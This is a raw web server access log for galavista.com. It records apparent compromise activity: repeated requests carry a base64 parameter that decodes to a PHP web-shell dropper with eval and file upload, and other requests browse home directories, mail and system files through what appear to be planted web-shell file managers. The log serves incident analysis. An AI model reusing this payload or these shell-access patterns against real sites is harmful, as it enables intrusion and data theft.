216.73.216.189 - - [01/Dec/2025:19:53:52 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_html%2F.well-known%2Facme-challenge HTTP/1.1" 200 714 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:19:52:09 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 5.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2770.0 Safari/537.36"
43.159.145.153 - - [01/Dec/2025:19:52:47 +0000] "GET /7709b/?path=/home/i442524 HTTP/1.1" 200 2119 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
43.135.172.89 - - [01/Dec/2025:20:01:23 +0000] "GET /7709b/?filesrc=/home/i442524/public_html/7709b/doc.php&path=/home/i442524/public_html/7709b HTTP/1.1" 200 4548 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:20:05:00 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fc25fe HTTP/1.1" 200 890 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:05:05 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fpublic_html%2F1d2be HTTP/1.1" 200 891 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.186.131.59 - - [01/Dec/2025:20:02:44 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:20:02:45 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:20:02:45 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:47.0) Gecko/20100101 Firefox/47.0"
216.73.216.189 - - [01/Dec/2025:20:06:26 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fpublic_html%2Fa3d14 HTTP/1.1" 200 887 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:06:26 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fpublic_html%2F7709b HTTP/1.1" 200 958 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:02:34 +0000] "GET /robots.txt HTTP/1.1" 404 1251 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
198.186.131.59 - - [01/Dec/2025:20:02:39 +0000] "GET / HTTP/1.1" 200 1494 "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:20:02:43 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:47.0) Gecko/20100101 Firefox/47.0"
198.186.131.59 - - [01/Dec/2025:20:02:44 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:47.0) Gecko/20100101 Firefox/47.0"
194.68.32.135 - - [01/Dec/2025:20:11:05 +0000] "GET / HTTP/1.1" 200 1497 "-" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:20:11:24 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:20:11:32 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:20:11:32 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
170.106.82.209 - - [01/Dec/2025:20:15:22 +0000] "GET /7709b/?path=/home HTTP/1.1" 200 943 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fmail%2F.Archive HTTP/1.1" 200 1048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Ftmp HTTP/1.1" 200 1025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /7709b/?path=%2Fhome%2Fi442524%2Fmail%2F.Archive HTTP/1.1" 200 1048 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /29b99/?path=%2Fhome%2Fi442524%2Fpublic_ftp HTTP/1.1" 200 849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fpam_timestamp_check&path=%2F%2Fsbin HTTP/1.1" 200 615 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /dfb27f996d.php?path=%2F%2Fhome3 HTTP/1.1" 200 661 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /dfb27f996d.php?path=%2F%2Fhome HTTP/1.1" 200 828 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot.list.index.log&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 641 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 1827 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2F.sitepad HTTP/1.1" 200 1482 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:07 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2F.gemrc&path=%2Fhome%2Fi442524 HTTP/1.1" 200 709 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:07 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.razor%2Fservers.nomination.lst&path=%2Fhome%2Fi442524%2F.razor HTTP/1.1" 200 665 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:07 +0000] "GET /dfb27f996d.php?filesrc=%2F%2Fsbin%2Fdnssec-coverage&path=%2F%2Fsbin HTTP/1.1" 200 1046 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:07 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot-uidvalidity.61e066d2&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:07 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fwww HTTP/1.1" 200 1287 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww%2Fstraf HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fmaildirsize&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:20:20:21 +0000] "GET /wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs= HTTP/1.1" 404 1251 "http://galavista.com/goods.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2709.94 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:20:20:21 +0000] "GET /ee0876bf4e72.php HTTP/1.1" 404 1251 "http://galavista.com/wp-admin/css/colors/blue/blue.php?wall=ZmlsZV9wdXRfY29udGVudHMoJF9TRVJWRVJbJ0RPQ1VNRU5UX1JPT1QnXS4nL2VlMDg3NmJmNGU3Mi5waHAnLCc8P3BocCBlY2hvIDQwOTcyMyoyMDtpZihtZDUoJF9DT09LSUVbImQiXSk9PSJcNjFceDM3XDYwXDYyXHgzOFwxNDZceDM0XDcwXDY3XDE0M1wxNDJceDMyXDE0MVw3MFx4MzRceDM2XHgzMFw2N1x4MzZcNjRceDM2XHg2NFwxNDFcNjNcMTQxXDE0NFw2M1w3MFw2N1x4MzhcMTQ1XDE0MyIpe2VjaG8iXHg2Zlx4NmIiO2V2YWwoYmFzZTY0X2RlY29kZSgkX1JFUVVFU1RbImlkIl0pKTtpZigkX1BPU1RbIlwxNjVcMTYwIl09PSJcMTY1XHg3MCIpe0Bjb3B5KCRfRklMRVNbIlx4NjZcMTUxXHg2Y1x4NjUiXVsiXDE2NFwxNTVceDcwXHg1Zlx4NmVceDYxXHg2ZFx4NjUiXSwkX0ZJTEVTWyJcMTQ2XHg2OVwxNTRceDY1Il1bIlwxNTZcMTQxXDE1NVx4NjUiXSk7fX0/PgonKTs=" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2709.94 Safari/537.36"
216.73.216.189 - - [01/Dec/2025:20:09:13 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2F.bash_logout&path=%2Fhome%2Fi442524 HTTP/1.1" 200 635 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:09:13 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Fpublic_ftp HTTP/1.1" 200 849 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:09:13 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.bash_profile&path=%2Fhome%2Fi442524 HTTP/1.1" 200 744 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:09:13 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2F.bashrc&path=%2Fhome%2Fi442524 HTTP/1.1" 200 764 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:09:13 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2Ftmp HTTP/1.1" 200 1025 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:09:48 +0000] "GET /d4fae/?path=%2Fhome%2F.. HTTP/1.1" 200 1941 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:09:48 +0000] "GET /dfb27f996d.php?path=%2Fhome%2Fi442524%2F.sitepad HTTP/1.1" 200 868 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
194.68.32.135 - - [01/Dec/2025:20:11:24 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
194.68.32.135 - - [01/Dec/2025:20:11:31 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (Windows NT 6.2; rv:48.0) Gecko/20100101 Firefox/48.0"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot-uidvalidity.61e066d2&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 649 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fmaildirsize&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 806 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /19055/?path=%2Fhome%2Fi442524%2Fwww%2Fce685 HTTP/1.1" 200 1502 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:05 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2F.gemrc&path=%2Fhome%2Fi442524 HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:16:06 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fmail%2Fdovecot.list.index.log&path=%2Fhome%2Fi442524%2Fmail HTTP/1.1" 200 0 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
192.121.16.196 - - [01/Dec/2025:20:20:18 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2709.94 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:20:20:18 +0000] "POST /chosen.php?upload HTTP/1.1" 404 1251 "http://galavista.com/mah.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2709.94 Safari/537.36"
192.121.16.196 - - [01/Dec/2025:20:20:21 +0000] "POST /goods.php?upload HTTP/1.1" 404 1251 "http://galavista.com/chosen.php?upload" "Mozilla/5.0 (X11; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2709.94 Safari/537.36"
43.130.39.254 - - [01/Dec/2025:20:23:42 +0000] "GET /7709b/?path=/home/i442524/public_html/7709b HTTP/1.1" 200 1098 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
198.186.131.59 - - [01/Dec/2025:20:29:57 +0000] "GET / HTTP/1.1" 200 1495 "-" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
198.186.131.59 - - [01/Dec/2025:20:30:00 +0000] "POST /mah.php?upload HTTP/1.1" 404 1251 "http://galavista.com/" "Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64; rv:46.0) Gecko/20100101 Firefox/46.0"
216.73.216.189 - - [01/Dec/2025:20:32:12 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fce685%2Findex.php&path=%2Fhome%2Fi442524%2Fpublic_html%2Fce685 HTTP/1.1" 200 26565 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:32:11 +0000] "GET /7709b/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F7709b%2Fdoc.php&path=%2Fhome%2Fi442524%2Fpublic_html%2F7709b HTTP/1.1" 200 4405 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:32:11 +0000] "GET /29b99/?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2F29b99%2Findex.php&path=%2Fhome%2Fi442524%2Fpublic_html%2F29b99 HTTP/1.1" 200 2790 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:04 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F7709b.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:04 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F29b99.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:05 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.cpanel_vcf_import_info%40galavista.com.tar&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 736 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:05 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.razor.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 652 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:06 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2F.subaccounts.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 653 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
216.73.216.189 - - [01/Dec/2025:20:35:06 +0000] "GET /dfb27f996d.php?filesrc=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d%2Feditor_nowrap.tar.gz&path=%2Fhome%2Fi442524%2Fpublic_html%2Fa839d HTTP/1.1" 200 657 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)"
